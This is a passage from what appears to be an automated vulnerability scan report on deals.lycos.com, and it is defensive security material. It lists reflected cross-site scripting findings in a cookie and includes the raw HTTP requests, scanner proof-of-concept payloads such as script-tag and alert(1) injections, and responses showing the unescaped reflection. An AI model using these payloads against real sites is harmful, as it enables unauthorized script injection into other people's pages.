Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A830f7"%3balert(1)//a3a48905539; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A830f7";alert(1)//a3a48905539"
});
</script>
...[SNIP]...

3.160. http://deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/canon-eos-60d-18mp-dslr-body-899-413793

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ef0"><script>alert(1)</script>8b18dd23c04 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/canon-eos-60d-18mp-dslr-body-899-413793 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A26ef0"><script>alert(1)</script>8b18dd23c04; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
rc="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A26ef0"><script>alert(1)</script>8b18dd23c04&amp;cj=1" alt="tracker" />
...[SNIP]...

3.161. http://deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8507a"%3balert(1)//42fd6a583c was submitted in the diktfc cookie. This input was echoed as 8507a";alert(1)//42fd6a583c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8507a"%3balert(1)//42fd6a583c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8507a";alert(1)//42fd6a583c"
});
</script>
...[SNIP]...

3.162. http://deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a778"><script>alert(1)</script>da4cec6ed03 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7a778"><script>alert(1)</script>da4cec6ed03; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
/b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7a778"><script>alert(1)</script>da4cec6ed03&amp;cj=1" alt="tracker" />
...[SNIP]...

3.163. http://deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b224"><script>alert(1)</script>91319e796f3 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b224"><script>alert(1)</script>91319e796f3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b224"><script>alert(1)</script>91319e796f3&amp;cj=1" alt="tracker" />
...[SNIP]...

3.164. http://deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82444"%3balert(1)//6b826531f72 was submitted in the diktfc cookie. This input was echoed as 82444";alert(1)//6b826531f72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82444"%3balert(1)//6b826531f72; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:45 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82444";alert(1)//6b826531f72"
});
</script>
...[SNIP]...

3.165. http://deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f1d2"%3balert(1)//3b0a90ac364 was submitted in the diktfc cookie. This input was echoed as 3f1d2";alert(1)//3b0a90ac364 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f1d2"%3balert(1)//3b0a90ac364; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f1d2";alert(1)//3b0a90ac364"
});
</script>
...[SNIP]...

3.166. http://deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3028"><script>alert(1)</script>900481f7494 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac3028"><script>alert(1)</script>900481f7494; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac3028"><script>alert(1)</script>900481f7494&amp;cj=1" alt="tracker" />
...[SNIP]...

3.167. http://deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-financial-services-25-off-laptops-more-414325

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 298e6"%3balert(1)//fd955e4e72f was submitted in the diktfc cookie. This input was echoed as 298e6";alert(1)//fd955e4e72f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-financial-services-25-off-laptops-more-414325 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298e6"%3balert(1)//fd955e4e72f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
>
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298e6";alert(1)//fd955e4e72f"
});
</script>
...[SNIP]...

3.168. http://deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-financial-services-25-off-laptops-more-414325

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7bd"><script>alert(1)</script>9753846fcc9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-financial-services-25-off-laptops-more-414325 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2e7bd"><script>alert(1)</script>9753846fcc9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2e7bd"><script>alert(1)</script>9753846fcc9&amp;cj=1" alt="tracker" />
...[SNIP]...

3.169. http://deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f572"><script>alert(1)</script>12d99f9dda4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f572"><script>alert(1)</script>12d99f9dda4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:29 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f572"><script>alert(1)</script>12d99f9dda4&amp;cj=1" alt="tracker" />
...[SNIP]...

3.170. http://deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7b9b"%3balert(1)//d6f0902539e was submitted in the diktfc cookie. This input was echoed as e7b9b";alert(1)//d6f0902539e in the application's response.

